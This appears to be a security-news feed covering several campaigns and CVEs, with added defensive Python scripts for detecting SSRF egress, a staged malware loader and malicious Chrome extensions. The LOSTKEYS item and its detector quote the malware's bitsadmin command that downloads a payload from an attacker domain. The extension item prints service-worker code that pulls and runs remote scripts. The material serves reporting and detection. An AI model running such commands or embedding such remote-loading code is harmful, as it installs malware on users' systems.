• A sophisticated cyberespionage campaign dubbed PassiveNeuron has emerged from the shadows after months of dormancy, with security researchers uncovering fresh details about its operations and attack methods. The campaign, first detected in June 2024, has resurfaced with renewed vigor, targeting government, financial and industrial organizations across Asia, Africa and Latin America with previously unknown malware […]

    The post PassiveNeuron Targets High-Profile Servers to Deploy Malware appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

  • Wilmington, Delaware, October 21st, 2025, CyberNewsWire: Sendmarc has announced the appointment of Dan Levinson as Customer Success Director – North America, furthering the company’s regional expansion and commitment to providing expert, locally aligned support to organizations across the continent. Levinson will lead the development of customer success programs that help businesses strengthen their email security […]

    The post Sendmarc appoints Dan Levinson as Customer Success Director in North America appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

  • CISA has issued an urgent alert about a critical server-side request forgery (SSRF) vulnerability in Oracle E-Business Suite, now actively exploited by threat actors.

    Tracked as CVE-2025-61884, the flaw affects the Runtime component of Oracle Configurator and allows remote attackers to forge requests without authentication, potentially leading to unauthorized access and data exfiltration.

    This vulnerability, rated with a high severity score under CVSS 3.1, stems from inadequate input validation that enables attackers to manipulate server requests to internal or external resources.

    As organizations rely heavily on Oracle E-Business Suite for enterprise resource planning (ERP), the risks are amplified in sectors like finance, manufacturing, and government, where sensitive data flows through these systems.

    Exploitation Tactics And Real-World Impact

    CISA’s Known Exploited Vulnerabilities (KEV) catalog added CVE-2025-61884 after evidence emerged of active exploitation in the wild.

    Attackers can leverage SSRF to scan internal networks, bypass firewalls, and interact with cloud metadata services, often as a stepping stone for broader intrusions.

    While direct ties to ransomware campaigns remain unconfirmed, security researchers note similarities to tactics used in recent supply chain attacks, where SSRF flaws have facilitated lateral movement.

    Oracle patched the issue in its October 2025 Critical Patch Update, but unpatched systems remain prime targets.

    Early reports indicate exploitation attempts targeting outdated E-Business Suite installations in the Asia-Pacific region, with potential for widespread compromise if organizations delay remediation.

    The flaw aligns with CWE-918, a common SSRF weakness that has plagued enterprise software for years.

    Mitigations

    CISA urges immediate action: apply Oracle’s vendor-provided patches or mitigations, such as network segmentation and web application firewalls (WAFs) tuned to block anomalous requests.

    For cloud-hosted instances, adhere to Binding Operational Directive (BOD) 22-01, which mandates vulnerability management in federal systems.

    If mitigations prove infeasible, CISA advises discontinuing use of affected products to avoid exposure. Experts emphasize proactive monitoring, including logging SSRF indicators like unexpected outbound traffic.

    Organizations should scan their networks for vulnerabilities using tools like Nessus or OpenVAS and review access logs for signs of exploitation.
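    The advisory recommends logging SSRF indicators such as unexpected outbound traffic. The script below is an added example (not CISA's or Oracle's code) of what that check looks like when run over an egress or proxy log: requests that originate from the E-Business Suite application tier and go to cloud instance-metadata endpoints, loopback, private address space, raw IP literals, or any external host not on an allowlist are reported. The log format, the host names and the allowlist are assumptions constructed for the example.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed egress-proxy log format (an assumption for this example, not an
# Oracle or CISA format): "<timestamp> src=<host> dst=<url> status=<code>"
LOG_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) status=(?P<status>\d+)$"
)

# Hostnames of the E-Business Suite application tier (placeholder names).
EBS_HOSTS = {"ebs-app-01", "ebs-app-02"}

# External hosts the EBS tier is expected to reach (placeholder allowlist).
EGRESS_ALLOWLIST = {"updates.example-vendor.invalid", "smtp.corp.invalid"}

# Cloud instance-metadata endpoints; a request to these from an application
# server, triggered by user-supplied input, is the classic SSRF pivot.
METADATA_HOSTS = {"169.254.169.254", "metadata.google.internal", "fd00:ec2::254"}


def classify_destination(url):
    """Return a reason label if the destination is an SSRF indicator, else None."""
    host = urlsplit(url).hostname or ""  # hostname strips IPv6 brackets and lowercases
    if host in METADATA_HOSTS:
        return "cloud-metadata-endpoint"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None  # a DNS name, not an address literal
    if ip is not None:
        if ip.is_loopback:
            return "loopback"
        if ip.is_private or ip.is_link_local:
            return "internal-address"
        return "raw-ip-destination"  # legitimate integrations normally use DNS names
    if host not in EGRESS_ALLOWLIST:
        return "unlisted-external-host"
    return None


def find_ssrf_indicators(lines):
    """Return (timestamp, source host, destination, reason) for suspicious EBS egress."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m or m["src"] not in EBS_HOSTS:
            continue  # malformed line, or traffic from a host this check does not cover
        reason = classify_destination(m["dst"])
        if reason:
            findings.append((m["ts"], m["src"], m["dst"], reason))
    return findings


# Constructed sample lines; the last one comes from a workstation and is ignored.
SAMPLE_LOG = """\
2025-10-21T10:00:01Z src=ebs-app-01 dst=https://updates.example-vendor.invalid/patch status=200
2025-10-21T10:00:05Z src=ebs-app-01 dst=http://169.254.169.254/latest/meta-data/ status=200
2025-10-21T10:00:09Z src=ebs-app-02 dst=http://10.0.3.15:8080/admin status=403
2025-10-21T10:00:12Z src=ebs-app-01 dst=http://127.0.0.1:7001/console status=200
2025-10-21T10:00:20Z src=ebs-app-01 dst=https://files.unknown-host.invalid/collect status=200
2025-10-21T10:00:25Z src=workstation-07 dst=http://169.254.169.254/ status=200
""".splitlines()

if __name__ == "__main__":
    for ts, src, dst, reason in find_ssrf_indicators(SAMPLE_LOG):
        print(f"{ts} {src} -> {dst}  [{reason}]")
```

    The allowlist is the part that needs tuning per environment: an ERP tier that legitimately calls many external services will produce noise on the "unlisted-external-host" rule, while the metadata, loopback and private-range rules should stay quiet on a healthy system and are worth alerting on directly.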

    The post CISA Warns Of Oracle E-Business Suite SSRF Vulnerability Actively Exploited In Attacks appeared first on Cyber Security News.

  • Luma Infostealer, a malware-as-a-service (MaaS) offering, has emerged as a potent threat targeting high-value credentials such as web browser cookies, cryptocurrency wallets, and VPN/RDP account information. Beyond isolated theft, threat actors are employing Luma in the initial infiltration stages of complex campaigns—ransomware deployment, account hijacking, and internal network compromise. The stolen data fuels identity theft, […]

    The post New Luma Infostealer Malware Steals Browser Data, Cryptocurrency, and Remote Access Accounts appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

  • Understanding exactly how users authenticate to cloud services is crucial for effective security monitoring. A recently refined bitfield mapping technique decodes the opaque UserAuthenticationMethod values in Microsoft 365 audit logs, transforming numeric codes into actionable, human-readable descriptions. This breakthrough empowers incident responders to identify primary authentication methods even when only Microsoft 365 audit logs are […]

    The post Decoding Microsoft 365 Audit Logs Using Bitfield Mapping: An Investigation Report appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

  • Apache Syncope has disclosed a critical security vulnerability that allows authenticated administrators to execute arbitrary code on affected systems. The flaw, tracked as CVE-2025-57738, impacts all Apache Syncope versions 3.x before 3.0.14 and 4.x before 4.0.2, exposing organisations to potential system compromise through malicious Groovy code injection. Vulnerability Details and Attack Mechanism: The vulnerability exists […]

    The post Apache Syncope Groovy Flaw Allows Remote Code Injection appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

  • Over the summer of 2025, a novel malware family emerged following the public disclosure of the LOSTKEYS implant.

    This new strain was rapidly weaponized in a series of highly targeted campaigns against policy advisors, non-governmental organizations, and dissidents.

    Leveraging a refreshed lure known as COLDCOPY ClickFix, threat actors masqueraded the payload as a CAPTCHA verification to dupe users into executing a malicious DLL via rundll32.

    Early samples demonstrated an aggressive development tempo marked by multiple iterations of the downloader component and backdoor stages.

    Google Cloud analysts noted that the loader, dubbed NOROBOT, began deployment within days after LOSTKEYS was profiled.

    Unlike its predecessor, which relied on a multi-stage PowerShell approach, NOROBOT invoked rundll32 iamnotarobot.dll,humanCheck to bootstrap the infection chain.

    Subsequent stages fetched partial cryptography keys and complementary payloads from attacker-controlled infrastructure, recombining components to decrypt and install a Python backdoor, YESROBOT.

    Initial operations saw YESROBOT deployed briefly in late May before being quickly replaced by a streamlined PowerShell backdoor, MAYBEROBOT.

    This change addressed the detection noise created by a bundled Python interpreter and enabled more flexible command execution without requiring a full interpreter runtime.

    Both backdoors maintained minimal built-in functions, relying on the operator to supply complex commands over HTTPS to a hardcoded command-and-control server.

    Within months, the malware reached its third major iteration, exhibiting not only simplified delivery but also rotating infrastructure and file naming conventions to evade network defenders.

    The malware development overview illustrates this evolution, from the initial complex downloader to the condensed logon script mechanism.

    Malware development overview (Source – Google Cloud)

    The COLDCOPY page attempting to lure the user into executing NOROBOT highlights the social engineering employed to trick targets into running a seemingly innocuous DLL.

    Infection Mechanism

    The infection begins when a user visits a compromised page posing as a custom CAPTCHA. The page prompts execution of iamnotarobot.dll, invoking the humanCheck export.

    Once loaded, NOROBOT retrieves encrypted payload fragments via bitsadmin:

    bitsadmin /transfer downloadJob /download /priority normal https://inspectguarantee.org/libsystemhealthcheck.py %APPDATA%\libsystemhealthcheck.py

    Next, the loader writes part of the AES key to the registry and schedules a task to assemble and decrypt the final payload.

    This staged approach forces defenders to collect multiple artifacts—downloads, registry entries, scheduled tasks—to reconstruct the complete chain.

    By splitting cryptographic keys and alternating downloader complexity, COLDRIVER maintains operational security while carrying out intelligence collection against high-value targets.
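    The staged chain described above (rundll32 loading a DLL by export name, a bitsadmin transfer into %APPDATA%, then a scheduled task) leaves three separate process-creation artifacts. The code below is an added example, not Google Cloud's or the article's, of correlating those artifacts per host so that the chain is reconstructed rather than seen as three isolated events. The events are constructed in the shape of trimmed Sysmon process-creation records; the first three reproduce the article's chain (the bitsadmin command line is the one quoted above, the task name and action are placeholders), the remaining two are benign look-alikes that must not fire.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 shape, fields trimmed;
# timestamps in seconds). Host names, task name and task action are placeholders.
SAMPLE_EVENTS = [
    {"ts": 100, "host": "ws-17", "parent": "explorer.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": "rundll32 iamnotarobot.dll,humanCheck"},
    {"ts": 103, "host": "ws-17", "parent": "rundll32.exe",
     "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": "bitsadmin /transfer downloadJob /download /priority normal "
                r"https://inspectguarantee.org/libsystemhealthcheck.py %APPDATA%\libsystemhealthcheck.py"},
    {"ts": 110, "host": "ws-17", "parent": "rundll32.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /tn SystemHealthCheck /tr "%APPDATA%\run.cmd" /sc minute /mo 10'},
    # Benign look-alikes: a system DLL export, and a software deployment download.
    {"ts": 200, "host": "ws-02", "parent": "svchost.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"ts": 300, "host": "ws-05", "parent": "cmd.exe",
     "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer deploy /download https://updates.corp.invalid/tool.msi C:\Deploy\tool.msi"},
]

USER_WRITABLE = re.compile(
    r"(%appdata%|%localappdata%|%temp%|\\appdata\\|\\temp\\|\\users\\public\\|\\downloads\\)",
    re.IGNORECASE,
)
SCRIPT_EXT = re.compile(r"\.(py|ps1|js|vbs|hta|cmd|bat)$", re.IGNORECASE)


def check_rundll32(cmd):
    """rundll32 calling an export from a DLL that is relative or in a user-writable path."""
    m = re.search(r"\brundll32(?:\.exe)?\s+(\S+?),(\w+)", cmd, re.IGNORECASE)
    if not m:
        return None
    dll, export = m.groups()
    relative = "\\" not in dll  # resolved from the working directory, not a system path
    if relative or USER_WRITABLE.search(dll):
        return f"rundll32 export {export} from user-controlled DLL {dll}"
    return None


def check_bitsadmin(cmd):
    """bitsadmin /transfer pulling a script-like file into a user-writable location."""
    if not re.search(r"\bbitsadmin(?:\.exe)?\b.*/transfer\b", cmd, re.IGNORECASE):
        return None
    m = re.search(r"(https?://\S+)\s+(\S+)\s*$", cmd, re.IGNORECASE)
    if not m:
        return None
    url, dest = m.groups()
    if USER_WRITABLE.search(dest) or SCRIPT_EXT.search(dest):
        return f"bitsadmin download {url} -> {dest}"
    return None


def check_schtasks(cmd):
    """schtasks /create: the persistence step of the chain."""
    if re.search(r"\bschtasks(?:\.exe)?\b.*/create\b", cmd, re.IGNORECASE):
        return "scheduled task creation"
    return None


STAGES = {
    "rundll32-user-dll": check_rundll32,
    "bitsadmin-download": check_bitsadmin,
    "schtasks-create": check_schtasks,
}


def check_event(event):
    """Return the (stage, detail) pairs a single event matches."""
    hits = []
    for stage, check in STAGES.items():
        detail = check(event["cmdline"])
        if detail:
            hits.append((stage, detail))
    return hits


def analyze(events, window=600):
    """Group stage hits per host; two or more distinct stages within `window`
    seconds are reported as a probable staged-loader chain."""
    per_host = {}
    for ev in events:
        for stage, detail in check_event(ev):
            entry = per_host.setdefault(ev["host"], {"stages": set(), "ts": [], "details": []})
            entry["stages"].add(stage)
            entry["ts"].append(ev["ts"])
            entry["details"].append(detail)
    report = {}
    for host, e in per_host.items():
        spread = max(e["ts"]) - min(e["ts"])
        report[host] = {
            "stages": sorted(e["stages"]),
            "details": e["details"],
            "chain": len(e["stages"]) >= 2 and spread <= window,
        }
    return report


if __name__ == "__main__":
    for host, r in analyze(SAMPLE_EVENTS).items():
        print(host, "CHAIN" if r["chain"] else "single hit", r["stages"])
```

    Each rule on its own is noisy (administrators do use bitsadmin and schtasks); the value is in the correlation step, which is why the benign events on ws-02 and ws-05 produce no report while ws-17 is flagged as a chain. The registry write of the partial AES key that the article mentions is a fourth artifact worth adding once the key path is known from your own sample.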

    The post New LOSTKEYS Malware Linked to Russia State-Sponsored Hacker Group COLDRIVER appeared first on Cyber Security News.

  • Motex has disclosed a severe remote code execution vulnerability in its LANSCOPE Endpoint Manager On-Premise Edition. Assigned CVE-2025-61932, the flaw carries a CVSS 3.0 score of 9.8, classifying it as an emergency-level threat.

    This vulnerability could allow attackers to execute arbitrary code on affected systems, potentially leading to full compromise of endpoint devices.

    The issue resides in the product’s Client Program (MR) and Detection Agent (DA), components responsible for managing and monitoring endpoint security.

    According to Motex’s announcement, versions up to 9.4.7.1 are vulnerable. Importantly, the cloud-based edition remains unaffected, sparing users of the SaaS version from immediate risk.

    However, the on-premise deployment, popular among organizations seeking greater control over their IT environments, now faces urgent scrutiny.

    LANSCOPE Endpoint Manager Vulnerability

    What elevates the alarm is evidence of active exploitation. Motex reports confirmed instances where customers’ environments received malicious packets from external sources.

    Attackers appear to target the client-side programs remotely, exploiting weaknesses that bypass typical network defenses.

    Security researchers speculate that this could stem from improper input validation in the detection and management protocols, though full technical details await independent analysis.

    This vulnerability underscores broader risks in endpoint management tools, which often run with elevated privileges. Once exploited, adversaries could deploy malware, steal sensitive data, or pivot deeper into corporate networks.

    Given the high CVSS score, driven by network accessibility, low attack complexity, and no privileges or user interaction required, organizations using affected versions should prioritize remediation.

    Motex has promptly released a fix, accessible via their customer support portal, LANSCOPE PORTAL. The update targets client PCs exclusively; the central manager does not require upgrading.

    Deployment follows standard procedures, making it straightforward for IT teams to roll out across endpoints. As of August 2025, when the advisory was issued, no widespread breaches have been publicly linked to this CVE, but the confirmed malicious activity signals potential for rapid escalation.

    Cybersecurity experts urge immediate patching to mitigate risks, especially in hybrid work setups where endpoints connect remotely.

    The post LANSCOPE Endpoint Manager Vulnerability Let Attackers Execute Remote Code appeared first on Cyber Security News.

  • A recent surge in underground cybercrime chatter has shone a spotlight on Monolock Ransomware V1.0, as multiple posts on dark web forums claim that the malicious software is now available for purchase. Cybersecurity researchers monitoring illicit marketplaces report that threat actors are advertising a fully functional ransomware strain, complete with encryption modules, key exchange mechanisms, […]

    The post Threat Actors Reportedly Marketing Monolock Ransomware on Dark Web Forums appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

  • Over the past several months, cybersecurity researchers have observed a surge of fraudulent Chrome extensions masquerading as legitimate WhatsApp Web automation tools.

    These 131 rebranded clones, each presented as a distinct offering, share an identical codebase designed to automate bulk messaging and scheduling without user consent.

    By injecting custom scripts directly into the WhatsApp Web interface, the extensions bypass native rate limits and anti-spam measures.

    Each listing advertises features such as message templates, scheduling controls, and analytics dashboards that appeal to small businesses, particularly in Brazil, where WhatsApp is critical for customer outreach.

    The extensions exploit Chrome’s Manifest V3 service worker capabilities to run background tasks, scheduling bulk sends without explicit user interaction.

    Chrome Web Store listings (Source – Socket.dev)

    Socket.dev analysts noted that the core module leverages a code snippet like:

    document.addEventListener('DOMContentLoaded', () => {
      const msgHelper = window.WPP.helpers.sendMessage;
      scheduledMessages.forEach(({contact, text, time}) => {
        setTimeout(() => msgHelper(contact, text), time);
      });
    });

    This injection attaches to the page’s DOM and invokes WhatsApp’s internal APIs, blurring the line between legitimate automation and malicious spamming campaigns.

    Socket.dev researchers identified that the service worker fetches a remote configuration file hosted on the operator’s infrastructure, enabling dynamic updates to message patterns and throttling parameters to evade detection.

    Despite Chrome Web Store policies prohibiting duplicate experiences and unauthorized messaging, all 131 extensions remained live as of mid-October 2025.

    Each clone is marketed under glossy landing pages with assurances of privacy compliance and rigorous code audits—claims that contradict platform guidelines.

    The extensions are distributed via a franchise-like reseller program: partners pay an upfront fee to license the tool, receive a custom branding package, and manage subscription plans while the original operator retains control over the backend.

    Evasion and Persistence Tactics

    The most sophisticated aspect of this campaign lies in its detection evasion strategy. By tuning send intervals, randomizing message content, and rotating publisher accounts, the operators maintain continuous operations despite takedown requests.

    A key persistence tactic involves polling the operator’s server for updated JavaScript payloads at regular intervals:

    self.addEventListener('periodicsync', event => {
      event.waitUntil(
        fetch(configUrl)
          .then(response => response.json())
          .then(cfg => importScripts(cfg.payloadUrl))
      );
    });

    This Manifest V3 periodic sync registration ensures that even if Chrome flags a particular payload, the extension can reload an unflagged version from the remote server.

    Coupled with varied naming conventions and thousands of active users across listings, the campaign exemplifies policy abuse at scale and underscores the need for enhanced extension governance and user vigilance.
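    Two things in this campaign are mechanically checkable before an extension is allowed into an organization: whether its service worker loads code chosen at run time (the fetch-then-importScripts pattern quoted above), and whether a new listing is a rebrand of code already seen. The script below is an added example, not Socket.dev's tooling or the extensions' code, of a static triage pass over a manifest.json and a service-worker file. The manifest, the extension name and the "rebranded" copy are constructed; the service-worker body is modelled on the periodic-sync snippet in the article.

```python
import hashlib
import json
import re

# Constructed manifest for a hypothetical clone; the extension name is invented.
SAMPLE_MANIFEST = json.dumps({
    "manifest_version": 3,
    "name": "WA Bulk Sender Pro",
    "background": {"service_worker": "sw.js"},
    "host_permissions": ["*://web.whatsapp.com/*"],
    "content_scripts": [{"matches": ["*://web.whatsapp.com/*"], "js": ["inject.js"]}],
})

# Service-worker source modelled on the periodic-sync snippet quoted in the article.
SAMPLE_SW = """
// poll the operator for a fresh payload
self.addEventListener('periodicsync', event => {
  event.waitUntil(
    fetch(configUrl)
      .then(response => response.json())
      .then(cfg => importScripts(cfg.payloadUrl))
  );
});
"""

# The same code as a "rebranded" copy: only comments and whitespace differ.
SAMPLE_SW_REBRANDED = """
/* ZapSender updater */
self.addEventListener('periodicsync',event=>{event.waitUntil(fetch(configUrl).then(response=>response.json()).then(cfg=>importScripts(cfg.payloadUrl)));});
"""

WHATSAPP = re.compile(r"web\.whatsapp\.com", re.IGNORECASE)
# One or more string literals separated by commas, e.g. 'a.js', "b.js"
LITERAL_ARGS = re.compile(r"""(['"])[^'"]*\1(?:\s*,\s*(['"])[^'"]*\2)*""")


def strip_js(source):
    """Rough normalization for fingerprinting: drop comments and whitespace.
    Not a JS parser: a '//' inside a string literal would also be cut."""
    no_block = re.sub(r"/\*.*?\*/", "", source, flags=re.S)
    no_line = re.sub(r"//[^\n]*", "", no_block)
    return re.sub(r"\s+", "", no_line)


def codebase_fingerprint(source):
    """Clones that differ only in comments/formatting collide on this hash."""
    return hashlib.sha256(strip_js(source).encode()).hexdigest()


def review_service_worker(source):
    findings = []
    for m in re.finditer(r"importScripts\(\s*([^)]*)\)", source):
        if not LITERAL_ARGS.fullmatch(m.group(1).strip()):
            findings.append("dynamic-importScripts")  # script location decided at run time
            break
    if re.search(r"addEventListener\(\s*['\"]periodicsync['\"]", source):
        findings.append("periodicsync-listener")
    if re.search(r"\bfetch\(", source) and "importScripts(" in source:
        findings.append("fetch-feeds-importScripts")
    return findings


def review_manifest(manifest_json):
    manifest = json.loads(manifest_json)
    targets = list(manifest.get("host_permissions", []))
    for cs in manifest.get("content_scripts", []):
        targets.extend(cs.get("matches", []))
    findings = []
    if any(WHATSAPP.search(t) for t in targets):
        findings.append("whatsapp-web-target")
    return findings


def triage(manifest_json, sw_source):
    """Combine manifest and worker findings with a codebase fingerprint for clustering."""
    findings = review_manifest(manifest_json) + review_service_worker(sw_source)
    return {
        "fingerprint": codebase_fingerprint(sw_source),
        "findings": findings,
        # Run-time code loading alone is enough to block; the rest is context.
        "suspicious": "dynamic-importScripts" in findings,
    }


if __name__ == "__main__":
    for sw in (SAMPLE_SW, SAMPLE_SW_REBRANDED):
        r = triage(SAMPLE_MANIFEST, sw)
        print(r["fingerprint"][:16], r["suspicious"], r["findings"])
```

    The fingerprint only catches clones that differ in comments and formatting; rebrands that also change branding strings need those literals normalized out (or a structural hash over the token stream) before they cluster. The dynamic-importScripts rule is the one to treat as a hard block: a service worker whose code is chosen by a remote configuration cannot be reviewed once and trusted afterwards.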

    The post 131 Malicious Extensions Targeting WhatsApp Used Found in Chrome Web Store appeared first on Cyber Security News.
